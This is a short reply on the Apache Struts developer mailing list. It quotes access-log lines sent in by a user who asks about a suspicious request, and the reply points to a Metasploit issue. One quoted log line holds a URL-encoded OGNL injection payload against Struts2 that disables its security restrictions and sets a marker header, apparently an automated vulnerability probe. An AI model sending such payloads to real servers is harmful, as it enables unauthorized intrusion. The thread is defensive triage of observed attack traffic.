Possibly in this section?:
https://github.com/rapid7/metasploit-framework/issues/8064

Am 20.01.19 um 13:02 schrieb Greg Huber:
> Any ideas?
> 
> 14.98.162.41 - - [18/Jan/2019:18:13:32 +0000] "POST
> /%25%7b(%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3f(%23_memberAccess%3d%23dm)%3a((%23container%3d%23context%5b%27com.opensymphony.xwork2.ActionContext.container%27%5d).(%23ognlUtil%3d%23container.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).(%23context.setMemberAccess(%23dm)))).(%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse()).(%23res.addHeader(%27eresult%27%2c%27struts2_security_check%27))%7d/index.action
> HTTP/1.1" 500 1497 "-" "Auto Spider 1.0"
> 14.98.162.41 - - [18/Jan/2019:18:13:32 +0000] "POST /index.action HTTP/1.1"
> 200 2023 "-" "Auto Spider 1.0"
> 
> Cheers Greg
> 


---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscr...@struts.apache.org
For additional commands, e-mail: dev-h...@struts.apache.org

Reply via email to